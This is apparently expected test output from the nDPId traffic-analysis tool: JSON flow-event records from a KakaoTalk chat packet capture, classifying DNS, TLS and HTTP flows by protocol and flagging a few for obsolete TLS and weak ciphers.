00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069072986,"flow_last_seen":1430069073299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1466,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00941{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00941{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
